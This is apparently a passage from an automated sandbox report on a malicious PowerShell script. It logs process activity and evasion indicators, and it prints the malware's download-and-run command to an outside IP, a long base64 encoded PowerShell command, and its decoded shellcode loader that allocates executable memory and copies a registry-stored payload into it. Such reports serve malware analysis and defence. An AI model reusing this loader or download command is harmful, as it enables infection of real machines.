UANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4264
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFF7F001978
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFF7F011958
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A1FA40
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A1A340
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A1A350
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07B08200
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07B0001E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07B00040
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "..." (full command line listed above)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_01
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_01
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220510
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eghthspv.xqw.ps1
    Source: classification engine | Classification label: mal72.troj.evad.winPS1@13/19@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

    Data Obfuscation

    Source: Yara match | File source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A1D7DD push FFFFFF8Bh; iretd 14_2_07A1D7E2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A1D589 push FFFFFF8Bh; iretd 14_2_07A1D58E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A10D5A push eax; mov dword ptr [esp], edx 14_2_07A10D6C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6447
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1931
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4093
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3021
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4356
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1022
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856 Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 4093 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep count: 3021 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436 Thread sleep time: -12912720851596678s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368 Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1300 Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1300 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll
    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Rl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000003.261623448.00000211B4F50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 00000003.00000002.300706520.00000167FFDB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brdfdtton Stvne Zinced INDSTT Mettartamg7 Sala cebal FORST Osteolit1 Undiscou6 Adressa Canadi9 OVERTALE Beme destrukti OSTEANRETN Driftsstyr1 INDLEDENDE Bagt7 BARSLEDES OOPHO Laced9 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Hexastich1{[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);}"@#DEHACHE Tosse3 Teater6 dialectic ENLISTEDR Fdse7 Astro Swerver9 downey ribhust Tagr Sprges Villa5 Heterodyn1 EUPLOI Bytte3 snkerfr Bundgarn strmkreds Ltningbi5 inds Airlift5 OCTAVINAVI Skokomishb Udrensning5 Thrawcy Monosodi5 impaleme Indsatsent7 ordensm $Hexastich3=0;$Hexastich9=1048576;$Hexastich8=[Hexastich1]::VA(-1,[ref]$Hexastich3,0,[ref]$Hexastich9,12288,64)$Senaterfo=(Get-ItemProperty -Path "HKCU:\Software\TIOLOG").Acetamidph2$Util = [System.Byte[]]::CreateInstance([System.Byte],$Senaterfo.Length / 2)For($i=0; $i -lt $Senaterfo.Length; $i+=2){ $Util[$i/2] = [convert]::ToByte($Senaterfo.Substring($i, 2), 16) }for($concomita=0; $concomita -lt $Util.count ; $concomita++){[Hexastich1]::RtlMoveMemory($Hexastich3+$concomita,[r
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzAD
UANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
